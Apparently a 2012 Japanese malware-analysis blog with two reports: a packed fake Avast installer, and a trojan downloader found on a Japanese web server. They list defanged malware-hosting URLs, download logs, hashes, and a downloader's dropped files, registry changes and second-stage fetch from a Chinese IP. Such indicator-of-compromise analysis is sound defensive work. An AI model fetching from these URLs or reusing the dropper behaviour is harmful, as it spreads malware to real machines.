日曜日, 5月 20, 2012

#OCJP-052: ”ニセ”AVASTアンチウイルス、呼ばれている「Gael/Tenga」のウイルス調査レポート、実は誤検知なのか?


今回不思議なPEファイルを発見しました。見た目はAVASTアンチウイルスっぽいです。スキャンしたらGael/Tengaウイルスだと「呼ばれて」います。ウイルススキャンの検知率を見たら37/42ですので、ほぼアンチウイルスが「ウイルス」だとの判断となります。
自分はなんども実行してみたら、実行が出来ない状況です。そして本「呼ばれている」マルウェアのPE形を確認したらPACKEDされたファイルで、転回して実行した見ても実効されない状況ですので、何故かウイルスやマルウェアの証明されたかと自分はなっとく分かりません。
可能性的には1)本当のアーカイブで作って失敗したAVASTアンチウイルスのインストーラー、2)AVASTアンチウイルスインストーラーの見た目にしたマルウェアファイルですがPACKで作った時に失敗した物です。可能性の2番目になったら非常に危ないので、長く考えた上でOCJP-052に本件の調査をさせて頂きました。詳細調査結果は下記となります↓
■下記のサーバ/IP↓

minhchung.net / 49.212.34.164
■下記のURL↓

hxxp://minhchung.net/EXE/avast_free_antivirus_setup.exe 
■ダウンロード証拠↓

--15:15:10--  hxxp://minhchung.net/EXE/avast_free_antivirus_setup.exe
           => `avast_free_antivirus_setup.exe.2'
Resolving minhchung.net... 49.212.34.164
Connecting to minhchung.net|49.212.34.164|:80... connected.
HTTP request sent, awaiting response...
  HTTP/1.1 200 OK
  Date: Sun, 20 May 2012 06:15:00 GMT
  Server: Apache/2.2.14 (Ubuntu)
  Last-Modified: Tue, 08 May 2012 17:16:54 GMT
  ETag: "e3006-2ff600-4bf898da71704"
  Accept-Ranges: bytes
  Content-Length: 3143168
  Keep-Alive: timeout=15, max=100
  Connection: Keep-Alive
  Content-Type: application/x-msdos-program
Length: 3,143,168 (3.0M) [application/x-msdos-program]
100%[====================================>] 3,143,168   1022.32K/s    ETA 00:00
15:15:13 (1019.22 KB/s) - `avast_free_antivirus_setup.exe.2' saved [3143168/3143168]
■ファイルの見た目↓

File name: avast_free_antivirus_setup.exe
MD5: 24740709eb74c2a8f4f19b0883ac5f27
File size: 3.0 MB ( 3143168 bytes )
File type: Win32 EXE
PE Information
Sections:
   UPX0 0x1000 0x575000 0 ←upxでパックされた
   UPX1 0x576000 0x2e9000 3047936 ←upxでパックされた
   .rsrc 0x85f000 0x16e52 94208


バイナリー的には(1st block)こんな感じ↓

0000  4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010  B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030  00 00 56 00 00 00 00 00 00 00 00 00 F8 00 00 00 ..V.............
0040  0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050  69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060  74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070  6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080  B6 6D 19 76 F2 0C 77 25 F2 0C 77 25 F2 0C 77 25 .m.v..w%..w%..w%
0090  4F 43 E1 25 F6 0C 77 25 FB 74 E2 25 EA 0C 77 25 OC.%..w%.t.%..w%
00A0  FB 74 F4 25 7A 0C 77 25 FB 74 F3 25 C8 0C 77 25 .t.%z.w%.t.%..w%
00B0  F2 0C 77 25 F3 0C 77 25 FB 74 E4 25 F9 0C 77 25 ..w%..w%.t.%..w%
00C0  F2 0C 76 25 42 0C 77 25 FB 74 FD 25 D5 0C 77 25 ..v%B.w%.t.%..w%
00D0  FB 74 E3 25 F3 0C 77 25 FB 74 E6 25 F3 0C 77 25 .t.%..w%.t.%..w%
00E0  52 69 63 68 F2 0C 77 25 00 00 00 00 00 00 00 00 Rich..w%........
00F0  00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 ........PE..L...
0100  45 A8 56 4F 00 00 00 00 00 00 00 00 E0 00 03 01 E.VO............
0110  0B 01 09 00 00 90 2E 00 00 60 01 00 00 50 57 00 .........`...PW.
0120  00 50 87 00 00 60 57 00 00 F0 85 00 00 00 40 00 .P...`W.......@.
0130  00 10 00 00 00 02 00 00 05 00 00 00 05 00 00 00 ................
0140  05 00 00 00 00 00 00 00 52 5E 87 00 00 10 00 00 ........R^......
0150  00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 ................
0160  00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ................
0170  00 00 00 00 00 00 00 00 F4 46 87 00 08 01 00 00 .........F......
0180  00 F0 85 00 F4 56 01 00 00 00 00 00 00 00 00 00 .....V..........
0190  A0 5C 74 04 90 69 00 00 00 00 00 00 00 00 00 00 ..t..i..........
01A0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01B0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01C0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01D0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01E0  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
01F0  55 50 58 30 00 00 00 00 00 50 57 00 00 10 00 00 UPX0.....PW..... 
■ウイルススキャン結果/マルウェア名↓

MD5:             24740709eb74c2a8f4f19b0883ac5f27
File size:       3.0 MB ( 3143168 bytes )
File name:       avast_free_antivirus_setup.exe
File type:       Win32 EXE
Detection ratio: 37 / 42
Analysis date:   2012-05-18 18:42:11 UTC
result:          [CLICK]

nProtect                 : Virus/W32.Tenga.3666
CAT-QuickHeal            : W32.Tenga.A
McAfee                   : W32/Gael.worm.a
TheHacker                : W32/Gael.worm.gen.A
K7AntiVirus              : Virus
VirusBuster              : Win32.Tenga.A
NOD32                    : Win32/Tenga.gen
F-Prot                   : W32/Tenga.3666
Symantec                 : W32.Licum
Norman                   : W32/Gael.A
TrendMicro-HouseCall     : PE_TENGA.A
Avast                    : Win32:Tenga
ClamAV                   : Worm.Tenga.A
Kaspersky                : Virus.Win32.Tenga.a
BitDefender              : Win32.Gael.3666
Emsisoft                 : Virus.Win32.Tenga!IK
Comodo                   : Worm.Win32.Gael.A
F-Secure                 : Win32.Gael.3666
DrWeb                    : Win32.Gael.3666
VIPRE                    : Virus.Win32.Tenga.a (v)
AntiVir                  : W32/Stanit
TrendMicro               : PE_TENGA.A
McAfee-GW-Edition        : W32/Gael.worm.a
Sophos                   : W32/Tenga-A
eTrust-Vet               : Win32/Gael.3666.A
Jiangmin                 : Win32/Tenga.a
Microsoft                : Virus:Win32/Gael.D
ViRobot                  : Win32.Tenga.A
GData                    : Win32.Gael.3666
Commtouch                : W32/Tenga.3666
AhnLab-V3                : Win32/Tenga.3666
PCTools                  : Malware.Licum
Rising                   : Win32.Tenga
Ikarus                   : Virus.Win32.Tenga
Fortinet                 : W32/Tenga.A
AVG                      : Win32/Gaelicum.A
Panda                    : W32/Tenga.A 
■マルウェアの調査情報↓

上記の説明したようにpackedされたバイナリーです。
unix経由でUPXの転回ソフトを使い本件の本当のバイナリーを転回しました。

※結果は↓

type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little
fd      6
size    0x856800
mode    r--
block   0x40 
packer: 
VC8 -> Microsoft Corporation
Microsoft Visual C++ 8 <--- just noted. 
Size: 
-rw-r--r--  1 unix freaxjp 8742912 May  9 02:16 sample.1 
↑サイズは大きいですね、大体8.5M、
Microsoft Visual C++ 8で作られた物も分かりました。


※転回したファイルの中身を見たらあやしいSTRING$コールが沢山出ました↓

//PCのファイル読み込み/書き込みパス
0000002F3C2C   0000006F862C      0   file://

//インターネットの動き
000000322EF6   0000007278F6   WINMM.dll
000000322F02   000000727902   InternetCloseHandle
000000322F18   000000727918   InternetSetOptionA
000000322F2E   00000072792E   InternetQueryOptionA
000000322F46   000000727946   HttpSendRequestA
000000322F5A   00000072795A   InternetCombineUrlA
000000322F70   000000727970   InternetOpenA
000000322F80   000000727980   HttpQueryInfoA
000000322F92   000000727992   InternetReadFile
000000322FA6   0000007279A6   InternetGetLastResponseInfoA
000000322FC6   0000007279C6   HttpOpenRequestA
000000322FDA   0000007279DA   InternetConnectA

//マルウェアがよく使われているコールを発見↓
0000003231C6   000000727BC6   GetCommandLineW
000000323366   000000727D66   GetTempFileNameA
00000032337A   000000727D7A   GetTempPathA
000000323430   000000727E30   GetCPInfo
00000032353C   000000727F3C   CreateFileW
00000032354A   000000727F4A   CreateFileMappingA
000000323616   000000728016   WriteFile
00000032393C   00000072833C   GetCommandLineA
00000032395A   00000072835A   DeleteFileA
0000003239E8   0000007283E8   GetSystemInfo
000000323A50   000000728450   HeapCreate
000000323A5E   00000072845E   HeapDestroy
000000323A6C   00000072846C   VirtualFree
000000323C3A   00000072863A   CreateFileA
000000324376   000000728D76   GetKeyState
0000003243D0   000000728DD0   GetClipboardData
000000324ED8   0000007298D8   RegCloseKey
000000324F5C   00000072995C   RegDeleteKeyW
000000324F8C   00000072998C   RegCreateKeyExW
000000324F9E   00000072999E   RegSetValueExW
000000324FBE   0000007299BE   ShellExecuteW
※下記の点に疑問も出ました↓

//本当のAVASTアンチウイルス無料版ですか?







↑疑問が出ましたので、公式なソフトと比べましょう↓


・公式なバーションのサイズが大きい、バーション情報迄は出ない、日付けは若干違います。
・本サンプルは本物と比べたらちゃんと製品とバーション情報が作ってくれたがサイズがすっごく小さい。

↑これを見たら一番最初に書いた結論が出ます。
ようは、公式なバーションですが作った時に途中失敗したのかなぁ。
だとしたらサイズが小さいの証明になります。
※バイナリー調査↓

unpackedのreversingでは
7C94E4F4で(ntdll.KiFastSystemCallRet)リターンした時に失敗が出ました。
ようは、リターン先のアドレスが存在しなかったから本サンプルを実行すると必ず失敗かと思われます。
※行動分析調査レポート↓

実行したら下記のエラーが出ます↓


その時のモジュール情報一覧とメモリREGISTER情報:

モジュール↓

Base       Size   Entry    Name     File version   Path
00400000 0085C000 0041B95B sample2  7.0.1426.0     C:\\unpacked-sample2
3B100000 0001B000 3B1013C0 IMJPCD   8.1.4202.0     C:\WINDOWS\IME\IMJP8_1\Dicts\IMJPCD.DIC
4EDC0000 00056000 4EDD72E9 imjp81   8.1.4206.0     C:\WINDOWS\system32\imjp81.ime
58730000 00038000 58731626 uxtheme  6.00.2900.5512 C:\WINDOWS\system32\uxtheme.dll
5AB60000 0009A000 5AB634BA COMCTL32 5.82 (xpsp.080 C:\WINDOWS\system32\COMCTL32.dll
60740000 00009000 60742EAD LPK      5.1.2600.5512  C:\WINDOWS\system32\LPK.DLL
648F0000 000D0000 64944A70 imjp81k  8.1.4202.0     C:\WINDOWS\system32\imjp81k.dll
73620000 0002E000 73639FE1 msctfime 5.1.2600.5512  C:\WINDOWS\system32\msctfime.ime
73F80000 0006B000 73F9E409 USP10    1.0420.2600.55 C:\WINDOWS\system32\USP10.dll
74660000 0004C000 746613A5 MSCTF    5.1.2600.5512  C:\WINDOWS\system32\MSCTF.dll
762E0000 0001D000 762E12C0 IMM32    5.1.2600.5512  C:\WINDOWS\system32\IMM32.DLL
76970000 0013D000 7698D0B9 ole32    5.1.2600.5512  C:\WINDOWS\system32\ole32.dll
77160000 00103000 77164256 comctl_1 6.0 (xpsp.0804 C:\WINDOWS\..\comctl32.dll
77BC0000 00058000 77BCF2A1 msvcrt   7.0.2600.5512  C:\WINDOWS\system32\msvcrt.dll
77CF0000 00090000 77CFB217 USER32   5.1.2600.5512  C:\WINDOWS\system32\USER32.dll
77D80000 000A9000 77D870FB ADVAPI32 5.1.2600.5512  C:\WINDOWS\system32\ADVAPI32.dll
77E30000 00092000 77E3628F RPCRT4   5.1.2600.5512  C:\WINDOWS\system32\RPCRT4.dll
77ED0000 00049000 77ED6587 GDI32    5.1.2600.5512  C:\WINDOWS\system32\GDI32.dll
77F20000 00076000 77F251FB SHLWAPI  6.00.2900.5512 C:\WINDOWS\system32\SHLWAPI.dll
77FA0000 00011000 77FA2126 Secur32  5.1.2600.5512  C:\WINDOWS\system32\Secur32.dll
7C800000 00133000 7C80B63E kernel32 5.1.2600.5512  C:\WINDOWS\system32\kernel32.dll
7C940000 0009C000 7C952C28 ntdll    5.1.2600.5512  C:\WINDOWS\system32\ntdll.dll
7D5B0000 00800000 7D5D74D6 SHELL32  6.00.2900.5512 C:\WINDOWS\system32\SHELL32.dll
Register:

EAX 00000001
ECX 0011EE00
EDX 7C94E4F4 ntdll.KiFastSystemCallRet
EBX 00000000
ESP 0011E5C8
EBP 0011E6BC
ESI 00000000
EDI 00000000
EIP 7C94E4F4 ntdll.KiFastSystemCallRet
C 0  ES 0023 32bit 0(FFFFFFFF)
P 0  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 0  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFDE000(FFF)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00000202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -1.7380721852873283750e+282
ST1 empty 0.0000009383782897300e-4933
ST2 empty +UNORM 003B 0011EE2C 00000000
ST3 empty -UNORM EE24 00000286 0000001B
ST4 empty +UNORM 0038 00000001 E115CB30
ST5 empty 1.0000000000000000000
ST6 empty -0.5000000000000000000
ST7 empty -0.5000000000000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1 
↑思ったように7C94E4F4で失敗が起きました。
せっかくですがOllyDbgで実行しながら監視スナップショットを取りましたので、
失敗した時の画面↓

■発見したマルウェアのサーバのネットワーク情報↓


↑さくらインターネットVPSを借りた中国人のドメインですね…
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 3:04 午後 0 comments

火曜日, 5月 15, 2012

#OCJP-051: 日本国内ネットワークにある中国関係のウェブサイト「guishudi.net / 27.120.90.179」に中国マルウェアダウンローダーを発見! 【対応最中】


今回中国パソコンで作られたマルウェアのダウンローダー調査です。本マルウェアは日本国内のウェブサーバに発見しました。感染URLを実行してしまうとマルウェアが実行されて、他の(また中国の)マルウェアをダウンロードしてしまう状況となります。
詳細情報は下記の説明となります↓
■下記のサーバ/IP↓

www.guishudi.net / 27.120.90.179 
■下記のURL↓

hxxp://www.guishudi.net/dnfwaigua/dnfmuma.exe
hxxp://guishudi.net/dnfwaigua/dnfmuma.exe
hxxp://27.120.90.179/dnfwaigua/dnfmuma.exe 
■ダウンロード証拠↓

--21:56:45--  hxxp://www.guishudi.net/dnfwaigua/dnfmuma.exe
           => `dnfmuma.exe'
Resolving www.guishudi.net... 27.120.90.179
Connecting to www.guishudi.net|27.120.90.179|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87,552 (86K) [application/octet-stream]
100%[====================================>] 87,552       510.83K/s
21:56:46 (509.00 KB/s) - `dnfmuma.exe' saved [87552/87552]

--14:32:37--  hxxp://guishudi.net/dnfwaigua/dnfmuma.exe
           => `dnfmuma.exe'
Resolving guishudi.net... 27.120.90.179
Connecting to guishudi.net|27.120.90.179|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 93,696 (92K) [application/octet-stream]
100%[====================================>] 93,696        --.--K/s
14:32:37 (1016.93 KB/s) - `dnfmuma.exe' saved [93696/93696]

--14:33:08--  hxxp://27.120.90.179/dnfwaigua/dnfmuma.exe
           => `dnfmuma.exe.1'
Connecting to 27.120.90.179:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 93,696 (92K) [application/octet-stream]
100%[====================================>] 93,696        --.--K/s
14:33:08 (2.37 MB/s) - `dnfmuma.exe.1' saved [93696/93696] 
■ファイルの見た目情報↓

 
■マルウェア種類↓

アファイル名 :「dnfmuma.exe」
ファイル種類  : Win32/PE(実行ファイル)
マルウェア種類: トロイ・ダウンローダー
マルウェア名 : Trojan-Downloader.Win32.Agent/TR/Dldr.Agent/DLOADER.Trojan
マルウェア機能: その他のマルウェアを感染されたPCにダウンロードする 
■ウイルススキャン↓

File name:       dnfmuma.exe
File size:       85.5 KB ( 87552 bytes )
MD5:             fcbe69086cc4fc85a644c6a2ce0a1c74
File type:       Win32 EXE
Tags:            upx
Detection ratio: 29 / 42
Analysis date:   2012-05-15 05:14:46 UTC
Result:          [CHECK] 
■現在のマルウェア名↓

McAfee                   : Artemis!565A2CA67CD7
TheHacker                : Posible_Worm32
VirusBuster              : Trojan.Packed!qbSnVakpGIA
NOD32                    : a variant of Win32/PSW.OnLineGames.PXJ
Symantec                 : Suspicious.Emit
Norman                   : W32/Obfuscated_FA
TrendMicro-HouseCall     : TROJ_GEN.R1FCDDD
Avast                    : Win32:Malware-gen
Kaspersky                : Trojan-Downloader.Win32.Agent.vogx
BitDefender              : Gen:Variant.Graftor.Elzob.2169
Sophos                   : Mal/Behav-004
F-Secure                 : Gen:Variant.Graftor.Elzob.2169
DrWeb                    : DLOADER.Trojan
AntiVir                  : TR/Dldr.Agent.vfpl
TrendMicro               : TROJ_GEN.R1FCDDD
McAfee-GW-Edition        : Artemis!565A2CA67CD7
Emsisoft                 : Trojan-Spy.Win32.Banker.ALR!IK
Jiangmin                 : Trojan/Generic.aavpm
Microsoft                : TrojanDownloader:Win32/Small.gen!AO
GData                    : Gen:Variant.Graftor.Elzob.2169
VBA32                    : TrojanDownloader.Agent.vftp
PCTools                  : HeurEngine.ZeroDayThreat
Rising                   : Suspicious
Ikarus                   : Trojan-Spy.Win32.Banker.ALR
AVG                      : Win32/Patched.EA
Panda                    : Suspicious file 
■マルウェア調査説明↓

バイナリーの形は↓

type    EXEC (Executable file)
os      windows
arch    i386
bits    32
endian  little
fd      6
size    0x16000
block   0x40
さくっと調べた情報は↓

Compile:  0x4F7D74F2 [Thu Apr 05 10:33:22 2012 UTC]
Packer:   UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John ReiserCryExe v4.0]
LangTrace: En/China 0x0409 0x04e4 
Reversingについて

packerがあれば1st blockのreversingがややこしいので↓
[0x4224f0L] mov esi 0x40d000 
[0x4224f1L] lea edi [si-0xc000L] 
[0x4224f6L] push r15d 
  :
  :
  :
[0x422563L] adc ebx ebx 
[0x422566L] adc ecx ecx 
[0x422568L] jnz 0x42258cL 
[0x42256aL] inc ecx 
※loopされますが[^C]した…
よく見たら↓2つPE sectionがpackedされた↓

Sections:
   UPX0 0x1000 0xc000 0
   UPX1 0xd000 0x16000 88064
   .rsrc 0x23000 0x1000 1024

Section Name: IMAGE_SECTION_HEADER  
              Entropy 0.0 
Name:                          UPX0
Misc:                          0xC000    
Misc_PhysicalAddress:          0xC000    
Misc_VirtualSize:              0xC000    
VirtualAddress:                0x1000    
SizeOfRawData:                 0x0       
PointerToRawData:              0x400     
PointerToRelocations:          0x0       
PointerToLinenumbers:          0x0       
NumberOfRelocations:           0x0       
NumberOfLinenumbers:           0x0       
Characteristics:               0xE0000080 

Section Name: IMAGE_SECTION_HEADER  
              Entropy 7.83600786727 
Name:                          UPX1
Misc:                          0x16000   
Misc_PhysicalAddress:          0x16000   
Misc_VirtualSize:              0x16000   
VirtualAddress:                0xD000    
SizeOfRawData:                 0x15800   
PointerToRawData:              0x400     
PointerToRelocations:          0x0       
PointerToLinenumbers:          0x0       
NumberOfRelocations:           0x0       
NumberOfLinenumbers:           0x0       
Characteristics:               0xE0000040 
なので、unix経由のUPXのupackコマンドを使えばsample.1ファイルを作りました。
この経由でよけなUPXのpackerコードが外したので、普通のreversingが出来ます。
因みにunpackedのファイルのウイルススキャンは↓

MD5:             5de53b9bc60c66646880bc7b68ef3c07
File size:       132.0 KB ( 135168 bytes )
File name:       sample.1
File type:       Win32 EXE
Detection ratio: 21 / 40
Analysis date:   2012-05-14 13:13:52 UTC
Result:          [CLICK] 
続いて、unpackedされたマルウェアファイルの調査結果は↓

あやしいコールを沢山発見しました、例えば↓

↑ここを見たらドロップファイルと移動ファイル動きがあります。
それともレジストリーに新しいバリューをセットされる事も分かりました。

インターネットからファイルのダウンロード動きがあるとの証明↓


↑これでマルウェアの物が分かりましたので、色々詳しくAPIで調査しました↓

マルウェアをDEBUGした時に下記のAPIがトラップしました↓

PID: 216 / 0xd8 
FileName: C:\…[sample.exe]
Addr1:     0x402ab2 
Commands1: CopyFileA(lpExistingFileName: "C:\…[sample.exe]", 
           lpNewFileName: "C:\WINDOWS\system32\ttt.mod", 
           bFailIfExists: 0x0)|0x1
そして↓
Addr2:     0x71aa3444
Commands2: CreateServiceA(hSCManager: 0x14f650, 
           lpServiceName: "WS2IFSL", 
           lpDisplayName: "Windows Socket 2.0 Non-IFS Service Provider Support Environment", 
           dwDesiredAccess: 0xf01ff, 
           dwServiceType: 0x1, 
           dwStartType: 0x1, 
           dwErrorControl: 0x1, 
           lpBinaryPathName: "\SystemRoot\System32\drivers\ws2ifsl.sys", 
           lpLoadOrderGroup: "PNP_TDI", 
           lpdwTagId: 0x0, 
           lpDependencies: 0x0, 
           lpServiceStartName: "(null)", 
           lpPassword: 0x0)|0x14f240 
その後直ぐに下記の動きが出ました(全部APIを書くと長すぎますのでSKIPします)↓

1. 元のマルウェアファイルを削除
2. レジストリー新しいキーが出ます↓

LM\Software\Microsoft\DownloadManager 
LM\System\..\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014
LM\System\..\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015
LM\System\..\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016
LM\System\..\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017
LM\System\..\Services\WS2IFSL\Enum 
LM\System\..\Services\WS2IFSL\Security
3. 全体的に纏めたら下記のファイルが出来上がりました↓

c:\windows\system32\0rxc.dll                    86016 f2986157be671a5c8769dd7087deb9b8
c:\windows\system32\dllcache\rasapi32.dll.gaga 236544 26049f7bbec85751f26bee0501cadde7
c:\windows\system32\dlsp.dll                    20480 565a2ca67cd7ae8c9e46cbb8513bfa77
c:\windows\system32\rasapi32.dll.bak           236544 cd1f7ed9842138beadf9ecbf37818bef
c:\windows\system32\rasapi32.dll.bak1          236544 cd1f7ed9842138beadf9ecbf37818bef
c:\windows\system32\ttt.mod                    135168 5de53b9bc60c66646880bc7b68ef3c07
c:\windows\system32\ttt86ttt86t950065.ttt         218 4dccad059bd113f851d7b1e16bc21cc8
c:\windows\system32\config\system        3145728 
c:\windows\system32\rasapi32.dll               236544 cd1f7ed9842138beadf9ecbf37818bef
c:\windows\system32\dllcache\rasapi32.dll      236544 cd1f7ed9842138beadf9ecbf37818bef
c:\windows\system32\drivers\ws2ifsl.sys         12288 
4. マルウェアのDRIVER情報↓

Base: 0xf8c7f000 
   size: 12,288bytes  0x3000 
   Flag: 0x9104000 
   Image: \SystemRoot\System32\drivers\ws2ifsl.sys 
↑レジストリーに下記のレコードが出ました↓

name: LM\System\CurrentControlSet\Services\WS2IFSL\ImagePath 
   type: REG_EXPAND_SZ 
   Size: 82 "
   Val: \SystemRoot\System32\drivers\ws2ifsl.sys" 
5. マルウェア・プロセス

上記の動きの結果は下記のマルウェア・プロセスが出来上がった↓
   PID: 260 / 0x104 
   Name: ttt.mod 
   Path: C:\WINDOWS\system32\ttt.mod
↑それと、本プロセス経由で2個SVCHOSTが実行されて、立ち上がりました↓

0x104 ttt.mod         0x18c 0x7c810856 0x71a5d5af MEM_IMAGE
   0x348 svchost.exe 0x784 0x7c810856 0x7c910760 MEM_IMAGE
   0x420 svchost.exe 0x194 0x7c810856 0x77df9981 MEM_IMAGE
6. ネットワークのトラフィック調査↓

全て上記の動きが終わったら直ぐにネットワークの動きが出ます。
   DNS:  c39059a89ab77d84.3322.org A Record
   HTTP: c39059a89ab77d84.3322.org (ESTABLISHED)
   それで下記のダウンロードと保存動きが出ます↓
   ダウンロードURL: hxxp://115.238.237.80:2266/mk.exe 
   保存場所: %System%\t910.exe 
リクエスト↓

GET /mk.exe HTTP/1.1
   Accept: */*
   Accept-Encoding: gzip, deflate
   User-Agent: などなど…
   Host: 115.238.237.80:2266
   Connection: Keep-Alive
回答↓

HTTP/1.1 200 OK
   Content-Length: 1114112
   Content-Type: application/octet-stream
   Last-Modified: Sat, 28 Apr 2012 06:12:52 GMT
   Accept-Ranges: bytes
   ETag: "04a7af1525cd1:360"
   Server: Microsoft-IIS/6.0
   Date: Mon, 14 May 2012 14:20:43 GMT
証拠(PCAPキャップチャーデータ)↓
 
一応、このマルウェアサーバ情報↓

inetnum: 115.238.236.0 - 115.238.237.255
   netname: HANGZHOU-SRT-TECHNOLOGY-CO-LTD
   country: CN
   descr:  HANGZHOU SRT TECHNOLOGY CO., LTD
   admin-c: BB324-AP
   tech-c:  CH119-AP
   mnt-irt: IRT-CHINANET-ZJ
   status:  ASSIGNED NON-PORTABLE
   changed: XXXXXXXXXXX@189.cn 20120214
   mnt-by: MAINT-CN-CHINANET-ZJ-HU
   source: APNIC
   
   person: Bing Bai
   nic-hdl: BB324-AP
   e-mail: anti_XXXX@mail.huptt.zj.cn
   address: Huzhou,Zhejiang.Postcode:313000
   phone: +86-13666633017
   country: CN
   changed: XXXXXXXXXXX@189.cn 20120214
   mnt-by: MAINT-CN-CHINANET-ZJ-HU
   source: APNIC
【備考】↑中国国内にあるサーバからのマルウェアがダウンロードされますね

直接にダウンロードして見たら↓

--23:02:28--  hxxp://115.238.237.80:2266/mk.exe
   => 'mk.exe'
   Connecting to 115.238.237.80:2266... connected.
   HTTP request sent, awaiting response... 200 OK
   Length: 1,114,112 (1.1M) [application/octet-stream]
ウイルススキャンをすると下記の結果を出ます↓

File name:       mk.exe
   MD5:             45409aa32c217c915ef6c493ffd039e6
   File size:       1.1 MB ( 1114112 bytes )
   File type:       Win32 EXE
   Detection ratio: 27 / 42
   Analysis date:   2012-05-14 14:23:31 UTC
   Result:          [CLICK]
   マルウェア名↓
   nProtect         : Trojan.Generic.KD.614810
   McAfee           : Artemis!45409AA32C21
   K7AntiVirus      : Riskware
   NOD32            : a variant of Win32/Packed.VMProtect.AAH
   Symantec         : Packed.Vmpbad!gen4
   Norman           : W32/Troj_Generic.BRRWU
   TrendMicro-House : TROJ_GEN.RC1C8E7
   Avast            : Win32:Malware-gen
   Kaspersky        : HEUR:Trojan.Win32.Generic
   BitDefender      : Trojan.Generic.KD.614810
   Emsisoft         : Virus.Win32.Heur!IK
   Comodo           : Virus.Win32.Virut.CE
   F-Secure         : Trojan.Generic.KD.614810
   VIPRE            : Trojan.Win32.Generic.pak!cobra
   AntiVir          : TR/Crypt.CFI.Gen
   TrendMicro       : TROJ_GEN.RC1C8E7
   McAfee-GW-Edition: Heuristic.LooksLike.Win32.SuspiciousPE.R
   Sophos           : Mal/Behav-363
   Jiangmin         : Trojan/Generic.adnmj
   Microsoft        : VirTool:Win32/Obfuscator.XZ
   GData            : Trojan.Generic.KD.614810
   PCTools          : HeurEngine.Vmpbad
   Rising           : Trojan.Win32.Generic.12C4905D
   Ikarus           : Virus.Win32.Heur
   Fortinet         : W32/Generic
   AVG              : Win32/Heur
   Panda            : Trj/Thed.V
↑ダウンロードされた物は完全にマルウェア/悪い物ですので、
   マルウェアだけど日本国内ネットワークと関係ないので、時間もないし、
   ダウンロードされた物の調査をしません
■感染された日本国内サーバのインターネット登録情報(手続きの為に)

ドメイン情報↓

Registrant:
   Liu Qi
   LinXiWuLuYuShuiTianLuJiaoHuiChu
   LinYi,  276000
   China
   Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
   Domain Name: GUISHUDI.NET
      Created on: 03-Jun-09
      Expires on: 03-Jun-15
      Last Updated on: 24-Dec-11
   Administrative/technical Contact:
      Qi, Liu  sdlyliuqi@163.com
      LinXiWuLuYuShuiTianLuJiaoHuiChu
      LinYi,  276000
      China
      86-539-8359826
IP情報↓

IP:             27.120.90.179
inetnum:        27.120.64.0 - 27.120.127.255
netname:        DTI
descr:          Dream Train Internet Inc.
descr:          E.Space Tower,
descr:          3-6, Maruyama-cho, Shibuya-ku, Tokyo
country:        JP
admin-c:        JNIC1-AP
tech-c:         JNIC1-AP
status:         ALLOCATED PORTABLE
remarks:        Email address for spam or abuse complaints : abuse@dti.ad.jp

inetnum:        27.120.90.0 - 27.120.90.255
netname:        DTI-NET
descr:          Dream Train Internet Inc.
country:        JP
tech-c:         AI4593JP
a. [JPNICハンドル]              AI4593JP
b. [氏名]                       石田 宏樹
c. [Last, First]                Ishida, Atsuki
d. [電子メイル]                 nic-db@dti.ad.jp
f. [組織名]                     株式会社ドリーム・トレイン・インターネット
g. [Organization]               Dream Train Internet INC 
【備考】本件のマルウェアダウンロードURLサーバオーナーは中国人らしいです。
   サーバは日本国内のインターネット回線にあると…)
インターネットのルーティンググラフ↓
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
Posted by unixfreaxjp at 2:18 午後 0 comments

月曜日, 5月 14, 2012

#OCJP-050: GMO/DigiRockのネットワークにある「oya2.net / 203.189.105.16」ウェブサーバにPHP/IRC-PBOT攻撃ツールを発見! 【対応最中】


